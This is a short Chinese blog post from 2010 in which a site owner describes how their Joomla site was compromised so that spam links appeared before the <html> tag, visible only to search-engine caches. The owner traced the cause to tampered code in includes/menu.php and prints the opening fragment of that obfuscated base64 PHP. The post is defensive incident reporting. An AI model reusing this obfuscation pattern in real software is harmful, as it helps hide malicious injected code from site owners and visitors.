joomla 网站受到黑客攻击,在前面被插入恶意代码
星期三, 6月 30th, 2010在<html>前面被插入恶意代码, 实在太恶心了。
在 <html> 标记之前产生的代码, 浏览器里面看源代码,一切正常。 但是如果用 lynx 查看, 或者 用百度快照 或者 google cache,就能看见被插入了很多恶意链接,生成在<html>标记之前。
看看我们的magento 中文网, 百度收录显示正常:
magentoecommerce-baidu
但是,点击快照, 恶意代码就出现了:
magentoecommerce-baidu-snapshot
joomla 网站受到黑客攻击,在前面被插入恶意代码的解决办法:(情况很多, 这里是我们遇到的情况)
joomla/includes/menu.php 被人为改了。 在文件的最后加上了。 base64了, 贱黑客, 花了我大半天时间。
$GLOBALS['_1872435205_']=Array(base64_decode(’YmF’ .’zZTY0X2RlY29k’ .’Z’ .’Q==’),base64_decode(’Zml’ .’sZ’ .’V9′ .’nZXR’ .’fY2′ .’9u’ .’d’ .’GVudH’ .’M=’),base64_decode(’cH’ .’JlZ’ .’19y’ .’ZXBsYWNl’),base64_decode(’ZXJ’ .’lZ2k=’),base64_decode(’ZXJ’ .’lZ’ .’2k=’),base64_decode(’Z’ .’X’ .’JlZ2k=’),base64_decode(” .’c3RybGVu’)); ?> ……………………….
